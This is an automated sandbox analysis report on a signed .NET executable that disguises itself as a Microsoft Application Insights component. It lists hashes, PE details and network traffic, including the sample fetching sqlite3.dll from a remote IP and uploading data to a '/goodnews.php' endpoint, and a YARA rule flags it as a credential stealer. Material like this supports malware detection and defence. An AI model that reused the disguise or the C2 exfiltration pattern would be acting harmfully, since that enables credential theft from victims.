Process:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.690918729230015
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Microsoft.ApplicationInsights.PersistenceChannel.exe
File size:	469480
MD5:	14e351015c5d632f888dbcac03871fae
SHA1:	b5471c5eea356ce87ac5c2df8bbd9bc72cf84da9
SHA256:	977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa
SHA512:	f7ac50b3cc68404ddc14579c9e12239a292afc4e034232274f8987579fbf3ea59a64403e122b946cceec9a383633cb3b7f3eedade819125a017de7c6a48a8947
SSDEEP:	6144:ebzheqatJY9oxu70Y7uh0doi9g9aPmaq/Ox4:O9aJYacQSuhqUaeb/L
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,jFV..............0......&........... ........@.. .......................`......@4....@................................

File Icon


Icon Hash:	e2a6e8b0e8d9d930

Static PE Info

General
Entrypoint:	0x46fdc2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x56466A2C [Fri Nov 13 22:54:36 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	8/17/2021 2:00:00 AM 8/14/2022 1:59:59 AM
Subject Chain	CN=Outer Join Srl, O=Outer Join Srl, L=Zedelgem, C=BE, SERIALNUMBER=0768.928.995, OID.1.3.6.1.4.1.311.60.2.1.3=BE, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	496D903D5FFB2AB64A03EE9BCFA4323B
Thumbprint SHA-1:	15DF03F2D9278D90153F81D5071EAD7BA48697E0
Thumbprint SHA-256:	3EBE83BAEC401EEDBD701081758867A60A2EDD7A59A79C964E84B546D66D0A53
Serial:	068A81AFE2E4F96574749439D8EDB89B

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6fca4	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0x2238	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x70600	0x23e8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x74000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6fcee	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x6ddc8	0x6de00	False	0.366469798777	data	4.53866232943	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x70000	0x2238	0x2400	False	0.821506076389	data	7.45298688866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x74000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x700e8	0x1c3f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x71d28	0x14	data
RT_VERSION	0x71d3c	0x4fc	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright Microsoft. All Rights Reserved.
Assembly Version	0.17.2.179
InternalName	Microsoft.ApplicationInsights.PersistenceChannel.dll
FileVersion	0.17.2.179
CompanyName	Microsoft
Comments	Application Insights SDK Persistence channel
ProductName	Application Insights SDK Windows Persistence channel
ProductVersion	0.17.2.179
FileDescription	Microsoft.ApplicationInsights.Channel.PersistenceChannel
OriginalFilename	Microsoft.ApplicationInsights.PersistenceChannel.dll

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2021 15:55:33.350672007 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.425278902 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.425386906 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.426397085 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.500878096 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504663944 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504699945 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504724026 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504754066 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504780054 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504781008 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.504802942 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504826069 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.504827976 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504853010 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504864931 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.504878044 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504901886 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.504901886 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.504945040 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579386950 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579421043 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579432964 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579446077 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579458952 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579477072 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579497099 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579514027 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579530954 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579556942 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579572916 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579591036 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579596996 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579607964 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579631090 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579649925 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579670906 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579691887 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579691887 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579710960 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579722881 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579730988 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579749107 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.579749107 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579777956 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.579826117 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654268026 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654303074 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654320002 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654340029 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654360056 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654378891 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654401064 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654422045 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654439926 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654453039 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654459000 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654478073 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654496908 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654515028 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654531002 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654534101 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654555082 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654562950 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654575109 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654589891 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654593945 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654613018 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654630899 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654632092 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654650927 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654669046 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.654675961 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654710054 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.654746056 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656788111 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656814098 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656832933 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656852007 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656869888 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656869888 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656888962 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656905890 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656908989 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656929970 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656949997 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656958103 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656969070 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.656981945 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.656989098 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657008886 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657018900 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.657027960 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657047033 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657062054 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.657067060 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657085896 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.657088995 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657109022 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.657115936 CEST	49759	80	192.168.2.4	77.222.42.92

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2021 15:55:22.849518061 CEST	53097	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:55:22.897259951 CEST	53	53097	8.8.8.8	192.168.2.4
Sep 13, 2021 15:55:26.109194040 CEST	49257	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:55:26.182873011 CEST	53	49257	8.8.8.8	192.168.2.4
Sep 13, 2021 15:55:55.131247044 CEST	62389	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:55:55.158786058 CEST	53	62389	8.8.8.8	192.168.2.4
Sep 13, 2021 15:55:57.725711107 CEST	49910	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:55:57.776540995 CEST	53	49910	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:15.637339115 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:15.704817057 CEST	53	55854	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:16.180253983 CEST	64549	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:16.215646029 CEST	53	64549	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:16.565119028 CEST	63153	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:16.603338957 CEST	53	63153	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:16.658411980 CEST	52991	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:16.725878954 CEST	53	52991	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:17.038184881 CEST	53700	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:17.072016001 CEST	53	53700	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:17.598453045 CEST	51726	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:17.634579897 CEST	53	51726	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:18.121629000 CEST	56794	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:18.156465054 CEST	53	56794	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:18.649760008 CEST	56534	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:18.683605909 CEST	53	56534	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:19.443746090 CEST	56627	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:19.468364954 CEST	53	56627	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:21.493029118 CEST	56621	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:21.525521994 CEST	53	56621	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:22.466659069 CEST	63116	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:22.499613047 CEST	53	63116	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:32.424149036 CEST	64078	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:32.449455976 CEST	64801	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:32.466336966 CEST	53	64078	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:32.481807947 CEST	53	64801	8.8.8.8	192.168.2.4
Sep 13, 2021 15:56:36.676203966 CEST	61721	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:56:36.710457087 CEST	53	61721	8.8.8.8	192.168.2.4
Sep 13, 2021 15:57:07.016707897 CEST	51255	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:57:07.052508116 CEST	53	51255	8.8.8.8	192.168.2.4
Sep 13, 2021 15:57:08.524023056 CEST	61522	53	192.168.2.4	8.8.8.8
Sep 13, 2021 15:57:08.564846039 CEST	53	61522	8.8.8.8	192.168.2.4

HTTP Request Dependency Graph

77.222.42.92

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49759	77.222.42.92	80	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2021 15:55:33.426397085 CEST	1218	OUT	GET /public/sqlite3.dll HTTP/1.1 Host: 77.222.42.92 Cache-Control: no-cache
Sep 13, 2021 15:55:33.504663944 CEST	1219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 13 Sep 2021 13:55:33 GMT Content-Type: application/x-msdos-program Content-Length: 645592 Connection: keep-alive Last-Modified: Tue, 24 Aug 2021 22:41:19 GMT ETag: "9d9d8-5ca55d50d41c0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 30 32 00 00 00 00 0d 01 00 00 00 e0 08 00 00 02 00 00 00 58 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 31 33 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R@0B/102X@B/113
Sep 13, 2021 15:55:35.510276079 CEST	1892	OUT	GET /goodnews.php HTTP/1.1 Host: 77.222.42.92 Connection: Keep-Alive
Sep 13, 2021 15:55:35.595369101 CEST	1892	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 13 Sep 2021 13:55:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Set-Cookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache
Sep 13, 2021 15:55:35.610235929 CEST	1893	OUT	POST /goodnews.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----E3WLNOHDJMYM7YUS Host: 77.222.42.92 Content-Length: 83420 Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=i76npj6r0gc1c1enofcjtna97v
Sep 13, 2021 15:55:35.879106045 CEST	1977	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 13 Sep 2021 13:55:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Microsoft.ApplicationInsights.PersistenceChannel.exe PID: 7056 Parent PID: 6504

General

Start time:	15:55:28
Start date:	13/09/2021
Path:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe'
Imagebase:	0xaf0000
File size:	469480 bytes
MD5 hash:	14E351015C5D632F888DBCAC03871FAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Analysis Process: Microsoft.ApplicationInsights.PersistenceChannel.exe PID: 6340 Parent PID: 7056

General

Start time:	15:55:32
Start date:	13/09/2021
Path:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Imagebase:	0x590000
File size:	469480 bytes
MD5 hash:	14E351015C5D632F888DBCAC03871FAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.684293295.0000000000BAB000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: cmd.exe PID: 2216 Parent PID: 6340

General

Start time:	15:55:36
Start date:	13/09/2021
